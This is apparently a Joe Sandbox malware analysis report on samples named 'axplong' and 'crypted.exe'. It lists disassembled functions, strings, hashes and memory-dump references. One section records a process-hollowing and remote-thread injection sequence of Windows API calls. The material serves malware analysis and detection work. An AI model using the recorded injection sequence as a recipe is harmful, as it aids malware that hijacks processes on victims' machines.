Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90da925ecaf3d9e7aa276f24fbd0b6e907afd2508885dcfe2346d6a96578493a
Instruction ID: 1ea7ab0a165afdc13c33d36fd6727515cb44708acf99392aeb9876e46f4e627d
Opcode Fuzzy Hash: 90da925ecaf3d9e7aa276f24fbd0b6e907afd2508885dcfe2346d6a96578493a
Instruction Fuzzy Hash: B1C0927684420C77DF112E83EC07E4A3F1A9BE57B0F088020FB1C19161EA77EA619689

Non-executed Functions

Function 001A645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50bf8a837bbe2da812566e7c3859210fd6c91724f1e605f272dcb1f53ed1fb95
Instruction ID: 5f00a3ad4a8168ecaf7d2843094b4aeae0dd8a94823a40f1950786b825665a6b
Opcode Fuzzy Hash: 50bf8a837bbe2da812566e7c3859210fd6c91724f1e605f272dcb1f53ed1fb95
Instruction Fuzzy Hash: 7CE08C34182B086BCE267B24C804D483B1AEF62344F044410FC048A622CB35EC82D980

Function 001AA1C2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 593f399f4e8774954788cf40fe5e71a5f778a323d4649206a37948672460a628
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: 44E04676915228FBCB25DBC88944D9AF2ECEB4AB00F554096B601D3241C370DF00C7D0

Function 00182E20 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 434COMMON

Download Yara Rule

Strings

invalid stoi argument, xrefs: 0018425A
8KG0fymoFx==, xrefs: 00182EC7
Fz==, xrefs: 0018369E
stoi argument out of range, xrefs: 00184269
WGt=, xrefs: 001833BA
HBhr, xrefs: 0018378F
246122658369, xrefs: 001833D4

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
API String ID: 0-2390467879
Opcode ID: b855651f22fc30dec923e1bf0a328cee595fe9eb96e535db2b66336ef6938120
Instruction ID: ecde7bf4aa99f74deeacc3f9e89396b456dfa01572ac22129953e39d9f09270b
Opcode Fuzzy Hash: b855651f22fc30dec923e1bf0a328cee595fe9eb96e535db2b66336ef6938120
Instruction Fuzzy Hash: 8E02C070A00248DFEF14EFA8C859BDEBBB5AF15304F644158E815A72C2D7759B84CFA1

Function 001A4770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001A47A7
___except_validate_context_record.LIBVCRUNTIME ref: 001A47AF
_ValidateLocalCookies.LIBCMT ref: 001A4838
__IsNonwritableInCurrentImage.LIBCMT ref: 001A4863
_ValidateLocalCookies.LIBCMT ref: 001A48B8

Strings

csm, xrefs: 001A484D

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 4bba6d4117297e65c258eb622450d5b0850661bd9e07aa7bce484327ac5c8368
Instruction ID: 35e0d3ba4fc7dca61548bc6bea97d06acede6eacf2aa7aa137d187cd769592e1
Opcode Fuzzy Hash: 4bba6d4117297e65c258eb622450d5b0850661bd9e07aa7bce484327ac5c8368
Instruction Fuzzy Hash: 0251FB38A002889BCF10DFA8D881AAE7FB6FF97314F148155E8149B352D7B5EE55CB90

Function 001B5942 Relevance: 8.9, Strings: 7, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

Strings

asin, xrefs: 001B5A88
acos, xrefs: 001B5A91
exp, xrefs: 001B59DA, 001B5A3F
sqrt, xrefs: 001B5A9A
pow, xrefs: 001B59F9, 001B5AA3, 001B5AF0
log10, xrefs: 001B599D, 001B59AC
log, xrefs: 001B59B8, 001B59C7

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 0-3064271455
Opcode ID: c4d0fc5da69afdc05542f80432cb7c6da111b30608653a4691ef795f3ebf5c96
Instruction ID: d7058f4295081c09973fb8fc1975662a92b3be710fb4caf87b17e280888311bc
Opcode Fuzzy Hash: c4d0fc5da69afdc05542f80432cb7c6da111b30608653a4691ef795f3ebf5c96
Instruction Fuzzy Hash: B751AB70804A0ACBDF049FA9E98C7EDBFB6FB15304F154289D880B72A4C7B18A65CF51

Function 001A70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 001A710B

Strings

.cmd, xrefs: 001A7129
.bat, xrefs: 001A713A
.exe, xrefs: 001A7118
.com, xrefs: 001A714B

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID: _wcsrchr
String ID: .bat$.cmd$.com$.exe
API String ID: 1752292252-4019086052
Opcode ID: 02d0bb144d866b4e9495b73eff455a472bb95a69efc5f544611039574320a53f
Instruction ID: a85cc6cb2d41268cb5ae42fc331814f1e4f97c22120c813ed3cd29e08c3180b8
Opcode Fuzzy Hash: 02d0bb144d866b4e9495b73eff455a472bb95a69efc5f544611039574320a53f
Instruction Fuzzy Hash: 5201D67F60C71626661864299C02A7B17DC9BA3BB8729002FF944F73C2EF55DD0281A0

Function 00172E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00172F1F
__Mtx_unlock.LIBCPMT ref: 00172F8C
__Cnd_broadcast.LIBCPMT ref: 00172FA3
__Mtx_unlock.LIBCPMT ref: 001730B5
__Mtx_unlock.LIBCPMT ref: 0017315B

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: bd52d921756ef2668a297d44c46604e7d6bc6e4b7cfa65ea6f7e0da3fef1a63b
Instruction ID: 10e22206cb326de8e42474e882e0f4b65e1a618841f7d46ef4128dc9f29a7432
Opcode Fuzzy Hash: bd52d921756ef2668a297d44c46604e7d6bc6e4b7cfa65ea6f7e0da3fef1a63b
Instruction Fuzzy Hash: B6A1D1B0A01205DFDB11EF64C944BAAB7B8FF25314F548529E829D7281EB31EB05DBE1

Function 001AC9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 001ACA37

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction ID: e655a4c3f2dc72f2787ba7e7a6974341f8261ccad420ebe3fbf0362c57989439
Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
Instruction Fuzzy Hash: 03B1253A9002859FDB15CF28C8817FEBBE5EF56350F1481AAE855EB341E7359D41CBA0

Function 0018BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0018BAFA
__Xtime_diff_to_millis2.LIBCPMT ref: 0018BB14
_xtime_get.LIBCPMT ref: 0018BB37
__Xtime_diff_to_millis2.LIBCPMT ref: 0018BB43

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 6a82d4e840a002d74d987be95f27e6ad3e258dcabc5410723ffc5491f11b70e1
Instruction ID: c3a32a9472929dcd83b3764d16bc0ab1bd93cb9c0c9bf2b9cc1b8e8117563565
Opcode Fuzzy Hash: 6a82d4e840a002d74d987be95f27e6ad3e258dcabc5410723ffc5491f11b70e1
Instruction Fuzzy Hash: C4212C71A01219AFDF11EFA4DC819AEBBB8EF58714F104069F601A7261DB30AE418FA1

Function 001742C0 Relevance: 5.1, Strings: 4, Instructions: 82COMMON

Download Yara Rule

Strings

broken promise, xrefs: 00174403
future already retrieved, xrefs: 0017440A
no state, xrefs: 00174418
promise already satisfied, xrefs: 00174411

Memory Dump Source

Source File: 00000006.00000002.3374291733.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true

Associated: 00000006.00000002.3374186520.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374291733.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3374930439.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000035D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000472000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000479000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3375042059.0000000000488000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3378162944.0000000000489000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379223943.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379398824.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379510236.0000000000628000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3379614939.0000000000629000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_170000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: broken promise$future already retrieved$no state$promise already satisfied
API String ID: 0-3399861469
Opcode ID: 694b98fbd11649d31c91e42d1cbc79acb3340405960ca2da28f7b023d13a21ff
Instruction ID: 550782b917a1dbf2db6dc739f1bf00e3f2ca44aec9ff9dda86cb6686cd5c49a3
Opcode Fuzzy Hash: 694b98fbd11649d31c91e42d1cbc79acb3340405960ca2da28f7b023d13a21ff
Instruction Fuzzy Hash: DB21DB71601A008BD728CF19C848B2ABBF5FB85724F148A5EE84ECB780DB35A900CB80

Analysis Process: crypted.exePID: 5328, Parent PID: 6664COMMON

Execution Graph

Execution Coverage:	30.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	20.7%
Total number of Nodes:	29
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02FC2555 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02FC26C4
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02FC26D7
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02FC26F5
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02FC2719
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02FC2744
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02FC279C
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02FC27E7
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02FC2825
Wow64SetThreadContext.KERNEL32(?,?), ref: 02FC2861
ResumeThread.KERNELBASE(?), ref: 02FC2870

Strings

aryA, xrefs: 02FC259B
Load, xrefs: 02FC2593
GetP, xrefs: 02FC25D7
ress, xrefs: 02FC25DF

Memory Dump Source

Source File: 00000007.00000002.2691947132.0000000002FC2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FC2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2fc2000_crypted.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 4a566c3ca4ad20a5fe9763fd6cda49bbe77a95fcaf7b652c142bd6ad336d950a
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 9EB1E47664028AAFDB60CF68CD80BDA77A5FF88714F158524EA0CAB341D774FA418B94

Function 01550B3A Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 341
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03FC3594,?,?,?), ref: 01550FB9

Strings

<1i;, xrefs: 01550CBC
#l>@, xrefs: 01550DA9

Memory Dump Source

Source File: 00000007.00000002.2691661296.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1550000_crypted.jbxd

Similarity

API ID: ProtectVirtual
String ID: #l>@$<1i;
API String ID: 544645111-2199172079
Opcode ID: e24c006f86f46a42ed5ef1da65c84626bb0e273d97710f54d97e47c09323304e
Instruction ID: dda783e26814f408745ab4e1e55fa56dc41cd13239eefbfe5fd01c71deea0559
Opcode Fuzzy Hash: e24c006f86f46a42ed5ef1da65c84626bb0e273d97710f54d97e47c09323304e
Instruction Fuzzy Hash: 37D18FB0D002698FCB51CFA9C990AADFBB2BF45314F24855AE859AF356C3349D41CF90

Function 01550504 Relevance: 1.6, APIs: 1, Instructions: 69
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateRemoteThread.KERNELBASE(?,00000000,?,?,00000000,?,?), ref: 0155109C

Memory Dump Source

Source File: 00000007.00000002.2691661296.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1550000_crypted.jbxd

Similarity

API ID: CreateRemoteThread
String ID:
API String ID: 4286614544-0
Opcode ID: 64b3daf2e3d9d9214d019748016a2584d628b5026cc8f5f63291a6d6ee634c13
Instruction ID: 80cb2f7ba22ba3d1463ee2453246946405553c72217e50bee549af7305bb5157
Opcode Fuzzy Hash: 64b3daf2e3d9d9214d019748016a2584d628b5026cc8f5f63291a6d6ee634c13
Instruction Fuzzy Hash: 7531E2B5A00249DFCB10DF9AD984BDEBFF5FB48310F20842AE919A7350D375A950CBA5

Function 01550FF8 Relevance: 1.6, APIs: 1, Instructions: 68
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateRemoteThread.KERNELBASE(?,00000000,?,?,00000000,?,?), ref: 0155109C

Memory Dump Source

